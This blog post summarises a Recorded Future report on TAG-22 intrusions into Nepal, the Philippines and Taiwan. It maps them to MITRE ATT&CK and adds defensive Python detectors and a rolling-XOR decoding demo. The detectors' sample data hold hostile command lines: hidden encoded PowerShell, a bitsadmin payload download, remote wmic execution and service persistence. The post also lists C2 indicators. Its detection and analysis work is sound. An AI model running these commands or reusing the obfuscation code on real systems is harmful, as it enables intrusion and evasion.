Jul 11, 2021
On July 8, 2021, Recorded Future's Insikt Group published an intelligence report titled “Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tools”. Insikt Group observed the activity targeting telecommunications providers and industrial technology institutes. The group likely gained initial access through compromised GlassFish servers, then used Cobalt Strike as a foothold to deploy backdoors including ShadowPad, Spyder and Winnti. In this campaign, Nepal Telecom assets were used as command and control servers.
Threat Activity Group 22 (TAG-22) is a temporary name assigned by Insikt Group to a cluster of private contractors (threat actors) who have historically operated on behalf of China's Ministry of State Security (MSS). The group's activity is assessed to overlap with the activity clusters tracked as Winnti (APT41) and Barium.
Adversary (TAG-22); Capabilities (Cobalt Strike, ShadowPad, Spyder and Winnti); Infrastructure (TTPs)
TTPs mapped to MITRE ATT&CK
Adversaries may use software, data, or commands to exploit a flaw in an Internet-facing computer or application in order to cause unintended or unexpected behavior. TAG-22 exploited GlassFish Server versions 3.1.2 and lower, then used the compromised servers as infrastructure for onward intrusion activity, including scanning with the Acunetix web vulnerability scanner and deploying the Cobalt Strike offensive security tool.
To gain access to victim systems, adversaries may send spearphishing emails with a malicious attachment. TAG-22 sent macro-enabled documents that drop the Fishmaster loader, and used double file extensions on Fishmaster Portable Executable (PE) files so that they appear to be Microsoft Office or PDF documents.
Adversaries may abuse PowerShell commands and scripts for execution. Cobalt Strike can use PowerShell to run a payload on a remote host, and the overlapping group APT41 has used PowerShell to deliver malware into victim environments.
Adversaries may abuse the Windows command shell for execution. TAG-22 uses Cobalt Strike, which interacts with compromised systems through a command-line interface; the overlapping group APT41 has also used cmd.exe to run commands on remote machines.
Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. APT41 uses WMI in several ways, including command execution via WMIEXEC and persistence via PowerSploit, and Cobalt Strike can use WMI to deliver a payload to a remote host.
Adversaries may abuse Background Intelligent Transfer Service (BITS) jobs to download payloads, execute them, or clean up after them; BITS jobs survive reboots, which makes them useful for persistence. APT41 used BITSAdmin to download and install payloads, and Cobalt Strike can use BITSAdmin to download a hosted “beacon” payload.
Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. APT41 has inserted Trojan backdoors into legitimate Windows services, Cobalt Strike can create a new service for persistence, and the Winnti backdoor registers its DLL as a new service in the Registry.
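The execution and persistence techniques in the preceding paragraphs (PowerShell, cmd.exe, WMI, BITSAdmin, service creation) all leave recognisable command lines in process-creation telemetry. The Python below is an added example written for this post, not code from the report or from Recorded Future: it runs a small set of detection rules over constructed Sysmon Event ID 1-style records. The sample command lines, hostnames, paths and the 203.0.113.10 address are made up for illustration.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1-like fields); not from the report.
EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAKQA="},
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"bitsadmin /transfer upd /download /priority high http://203.0.113.10/b.bin C:\Users\Public\b.bin"},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'wmic /node:FILESRV01 process call create "cmd.exe /c whoami > C:\Windows\Temp\o.txt"'},
    {"Image": r"C:\Windows\System32\sc.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'sc create WinUpdSvc binPath= "C:\ProgramData\svchost.exe" start= auto'},
    # Benign PowerShell use from an interactive session; must not match.
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe Get-ChildItem C:\Users"},
]

# Each rule: (name, case-insensitive regex applied to the command line).
RULES = [
    # PowerShell started with an encoded command or a hidden window, the shape of
    # Cobalt Strike's PowerShell one-liners and of many loaders.
    ("powershell_encoded_or_hidden",
     re.compile(r"powershell.*?(\s-(e|ec|enc|encodedcommand)\s|\s-w(indowstyle)?\s+hidden\b)", re.I)),
    # BITSAdmin pulling a payload from a URL.
    ("bitsadmin_download",
     re.compile(r"\bbitsadmin(\.exe)?\s.*?/transfer\b.*?https?://", re.I)),
    # WMI spawning a process, frequently on a remote host via /node:.
    ("wmi_process_create",
     re.compile(r"\bwmic(\.exe)?\s.*?\bprocess\s+call\s+create\b", re.I)),
    # Service created or repointed at a binary path (persistence).
    ("service_create_or_config",
     re.compile(r"\bsc(\.exe)?\s+(create|config)\b.*?\bbinpath\b", re.I)),
]


def match_rules(event):
    """Return the names of every rule whose pattern matches the event's command line."""
    cmd = event.get("CommandLine", "")
    return [name for name, pattern in RULES if pattern.search(cmd)]


def scan(events):
    """Map event index -> matched rule names, for events that matched at least one rule."""
    hits = {}
    for idx, event in enumerate(events):
        matched = match_rules(event)
        if matched:
            hits[idx] = matched
    return hits


if __name__ == "__main__":
    for idx, names in scan(EVENTS).items():
        print(idx, names, EVENTS[idx]["CommandLine"][:70])
```

In production these rules belong in your SIEM's query language with parent-process and user context added; the point here is that each LOLBIN in the TTP list has a stable command-line shape worth alerting on.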
Adversaries can hijack the search order Windows uses to load DLLs so that their own malicious payload is loaded instead. APT41 has used legitimate executables to side-load its malware, and ShadowPad's launcher is loaded by DLL side-loading from a legitimate executable.
Adversaries may inject code into processes to evade process-based defenses and possibly elevate privileges. Cobalt Strike can inject a variety of payloads into processes the operator chooses at run time, and ShadowPad is injected into a wmplayer.exe process.
Adversaries may use obfuscated files or information to hide intrusion artifacts from analysis and detection. Cobalt Strike can deobfuscate shellcode using a rolling XOR, and the ShadowPad launcher decrypts its payload with XOR and a custom algorithm.
Adversaries may remove indicators from their tools if they believe the malicious program has been detected, quarantined or otherwise blocked. Cobalt Strike's “beacon” payload can be modified to remove known signatures or unpacking methods, and ShadowPad's shellcode is XOR-encoded and uses fake conditional jumps to hinder disassembly.
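A rolling XOR, as mentioned above for Cobalt Strike, chains the key through the data so that a single fixed XOR byte no longer recovers the payload. The Python below is an added example for this post, not Cobalt Strike's actual decoder or anything from the report: it implements one illustrative variant (each ciphertext dword becomes the key for the next) and then shows why such obfuscation is weak, since a known first plaintext dword yields the key immediately. The sample bytes are constructed from the widely shared x86 "block API" shellcode prologue and do nothing on their own.

```python
import struct

# Constructed sample plaintext: the first 30 bytes of the common x86 block-API shellcode
# prologue (cld; call; pushad; mov ebp,esp; ...). Its fc e8 opening is a familiar
# analyst heuristic, which is exactly what the known-plaintext step below exploits.
SAMPLE_SHELLCODE = bytes.fromhex(
    "fce8890000006089e531d2648b52308b520c8b52148b72280fb74a2631ff")


def _dword(chunk: bytes) -> int:
    """Little-endian dword from up to 4 bytes, zero-padded on the right."""
    return struct.unpack("<I", chunk.ljust(4, b"\x00"))[0]


def rolling_xor_encode(plain: bytes, key: int) -> bytes:
    """Encode: XOR each dword with the key, then the key becomes that ciphertext dword.

    Trailing bytes (len not a multiple of 4) are handled by padding and truncating.
    """
    out = bytearray()
    for i in range(0, len(plain), 4):
        chunk = plain[i:i + 4]
        cipher = _dword(chunk) ^ key
        out += struct.pack("<I", cipher)[:len(chunk)]
        key = cipher
    return bytes(out)


def rolling_xor_decode(cipher: bytes, key: int) -> bytes:
    """Decode: mirror of encode; the key chain is rebuilt from the ciphertext alone."""
    out = bytearray()
    for i in range(0, len(cipher), 4):
        chunk = cipher[i:i + 4]
        c = _dword(chunk)
        out += struct.pack("<I", c ^ key)[:len(chunk)]
        key = c
    return bytes(out)


def recover_key(cipher: bytes, known_plain_prefix: bytes) -> int:
    """Known-plaintext attack: the initial key is cipher[0:4] XOR plain[0:4]."""
    if len(cipher) < 4 or len(known_plain_prefix) < 4:
        raise ValueError("need at least four bytes of ciphertext and known plaintext")
    return _dword(cipher[:4]) ^ _dword(known_plain_prefix[:4])


if __name__ == "__main__":
    key = 0x9E3779B9  # arbitrary 4-byte key for the demo
    ct = rolling_xor_encode(SAMPLE_SHELLCODE, key)
    print("ciphertext:", ct.hex())
    guessed = recover_key(ct, b"\xfc\xe8\x89\x00")
    print("recovered key: 0x%08x" % guessed)
    print("decoded ok:", rolling_xor_decode(ct, guessed) == SAMPLE_SHELLCODE)
```

The takeaway for triage: a stager's obfuscated blob is not encryption. If you can guess four plaintext bytes (a standard stub prologue, an MZ header, a known string), you can recover the key and the payload without running anything.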
Adversaries may use hidden windows to conceal malicious activity from the user's view; windows that would normally appear when an application runs can be suppressed. ShadowPad is injected into a wmplayer.exe process whose window is hidden.
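The three techniques above (DLL side-loading, injection into wmplayer.exe, hidden window) share one observable: a legitimate signed host binary loading a DLL it has no business loading, often after the binary itself was copied to a writable directory. The Python below is an added example written for this post, not code from the report: it triages constructed Sysmon Event ID 7-style image-load records for wmplayer.exe, flagging loads of unsigned DLLs, DLLs outside the system and install directories, and a host binary running from outside its install directory. The Signed field is simplified to a boolean and all paths are made up.

```python
from pathlib import PureWindowsPath

# Directories from which a DLL load into a profiled host is considered expected.
SYSTEM_DIRS = [PureWindowsPath(p) for p in (
    r"C:\Windows\System32", r"C:\Windows\SysWOW64", r"C:\Windows\WinSxS")]

# Legitimate install locations of the signed host binaries we profile. wmplayer.exe is
# the host named for ShadowPad; add other commonly side-loaded binaries the same way.
EXPECTED_HOST_DIRS = {
    "wmplayer.exe": [PureWindowsPath(r"C:\Program Files\Windows Media Player"),
                     PureWindowsPath(r"C:\Program Files (x86)\Windows Media Player")],
}

# Constructed Sysmon Event ID 7-like records (Image = process, ImageLoaded = DLL).
IMAGE_LOADS = [
    {"Image": r"C:\Program Files\Windows Media Player\wmplayer.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll", "Signed": True},
    {"Image": r"C:\Program Files\Windows Media Player\wmplayer.exe",
     "ImageLoaded": r"C:\Program Files\Windows Media Player\wmp.dll", "Signed": True},
    # Classic side-load: legitimate exe copied next to a malicious DLL in a user-writable dir.
    {"Image": r"C:\Users\Public\Libraries\wmplayer.exe",
     "ImageLoaded": r"C:\Users\Public\Libraries\log.dll", "Signed": False},
    # Host in place, but an unsigned DLL with a legitimate-looking name from ProgramData.
    {"Image": r"C:\Program Files\Windows Media Player\wmplayer.exe",
     "ImageLoaded": r"C:\ProgramData\Microsoft\wmp.dll", "Signed": False},
    # A process we do not profile; ignored.
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ImageLoaded": r"C:\Windows\System32\user32.dll", "Signed": True},
]


def is_under(path, directories):
    """True if path is inside one of the directories (PureWindowsPath compares case-insensitively)."""
    return any(d in path.parents for d in directories)


def classify(record):
    """Return the list of reasons this image load is suspicious (empty = nothing to see)."""
    host = PureWindowsPath(record["Image"])
    dll = PureWindowsPath(record["ImageLoaded"])
    expected = EXPECTED_HOST_DIRS.get(host.name.lower())
    if expected is None:
        return []  # not a host binary we profile
    reasons = []
    if not is_under(host, expected):
        reasons.append("host_outside_install_dir")
    if not is_under(dll, SYSTEM_DIRS + expected):
        reasons.append("dll_outside_trusted_dirs")
    if not record.get("Signed", False):
        reasons.append("dll_unsigned")
    return reasons


def triage(records):
    """Map record index -> reasons, for records with at least one reason."""
    return {i: classify(r) for i, r in enumerate(records) if classify(r)}


if __name__ == "__main__":
    for i, reasons in triage(IMAGE_LOADS).items():
        print(i, IMAGE_LOADS[i]["Image"], "->", IMAGE_LOADS[i]["ImageLoaded"], reasons)
```

An allow-list of (host, DLL directory) pairs is coarse but cheap, and it catches the two common side-loading layouts: the whole pair relocated to a writable directory, and a rogue DLL dropped into a path that precedes the real one in the search order.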
Adversaries may attempt to list open application windows. ShadowPad's keylogging module can list open windows.
Adversaries may enumerate files and directories, or search for specific information in particular locations on a host or network share. ShadowPad's Recent Files module lists files that have been accessed recently.
Adversaries may look for details about the network configuration and settings of systems they access, or gather the same information about remote systems. Cobalt Strike can determine the IP addresses of domain controllers.
Adversaries may attempt to list network connections to or from the compromised system, or from remote systems, by querying information over the network. Cobalt Strike can produce a sessions report from compromised hosts.
Adversaries may log users' keystrokes to capture credentials as they are typed. ShadowPad has a keylogging module.
Adversaries may capture screenshots of the desktop to gather information. ShadowPad includes a screenshot module.
Adversaries may communicate using application layer protocols to blend in with existing traffic and avoid detection or network filtering. TAG-22 has used HTTP and HTTPS for C2 communications.
Adversaries may communicate over a protocol and port pairing that is not normally associated with that protocol. TAG-22 uses TCP port 56006 for C2 communications.
Adversaries may exfiltrate data over an existing command and control channel rather than opening a separate connection. TAG-22 uses this technique to exfiltrate data over its C2 channel.
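The C2 behaviour described above (HTTP/HTTPS, the non-standard TCP port 56006, and the C2 domain vt.livehost[.]live named later in this post) can be hunted in flow data. The Python below is an added example for this post, not code from the report: it runs over constructed Zeek conn.log-style records and flags three things, connections to the 56006/tcp port, TLS SNI matching the IOC domain, and low-jitter periodic connections of the kind a Cobalt Strike beacon with a fixed sleep produces. The client and server IP addresses, timestamps and the example.com traffic are made up; the IOC set can be extended with the indicators from the report.

```python
from collections import defaultdict
from statistics import mean, pstdev

IOC_DOMAINS = {"vt.livehost.live"}   # C2 domain from the report (defanged in the post as vt.livehost[.]live)
IOC_PORTS = {56006}                  # TCP port the post attributes to TAG-22 C2
MIN_BEACONS = 5                      # minimum connections before we judge periodicity
MAX_JITTER_CV = 0.15                 # coefficient of variation of inter-connection gaps


def flow(ts, src, dst, dport, sni=None, proto="tcp"):
    """Build one Zeek conn.log-like record (fields reduced to what the rules need)."""
    return {"ts": ts, "src": src, "dst": dst, "dport": dport, "proto": proto, "sni": sni}


# Constructed flow records; not real traffic.
BEACON_TS = [1000, 1061, 1120, 1181, 1240, 1300]        # ~60 s sleep, small jitter
FLOWS = (
    [flow(t, "10.0.0.5", "198.51.100.7", 443, "vt.livehost.live") for t in BEACON_TS]
    + [flow(1500, "10.0.0.7", "198.51.100.9", 56006)]   # single hit on the odd port
    + [flow(t, "10.0.0.5", "203.0.113.20", 443, "example.com") for t in (1005, 1012, 1100)]
)


def detect(flows):
    """Return {(src, dst, dport): sorted reasons} for every flow group that tripped a rule."""
    reasons = defaultdict(set)
    by_key = defaultdict(list)
    for f in flows:
        key = (f["src"], f["dst"], f["dport"])
        by_key[key].append(f["ts"])
        if f["proto"] == "tcp" and f["dport"] in IOC_PORTS:
            reasons[key].add("c2_port_56006")
        if f.get("sni") in IOC_DOMAINS:
            reasons[key].add("ioc_domain")
    # Periodicity: many connections to the same endpoint with near-constant spacing.
    for key, times in by_key.items():
        if len(times) < MIN_BEACONS:
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        m = mean(gaps)
        if m > 0 and pstdev(gaps) / m < MAX_JITTER_CV:
            reasons[key].add("periodic_beacon")
    return {k: sorted(v) for k, v in reasons.items()}


if __name__ == "__main__":
    for key, why in detect(FLOWS).items():
        print(key, why)
```

The IOC rules are brittle by nature (domains and ports change between campaigns); the periodicity rule is the one that generalises, and the jitter threshold is the knob to tune against your own baseline of legitimate polling traffic.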
Using Recorded Future Network Traffic Analysis (NTA) data, Insikt Group identified TAG-22 intrusions in June 2021 against the following organizations in Taiwan, Nepal, and the Philippines:
Department of Information and Communications Technology (The Philippines)
The Industrial Technology Research Institute (ITRI) in Taiwan
By combining Recorded Future C2 detections with passive DNS data, researchers linked the TAG-22 C2 domain vt.livehost[.]live to ShadowPad and Spyder backdoor samples. This allowed them to pivot to the TAG-22 IP address 126.96.36.199, which the group uses for both ShadowPad and Spyder command and control.
The summary graph is shown in the figure below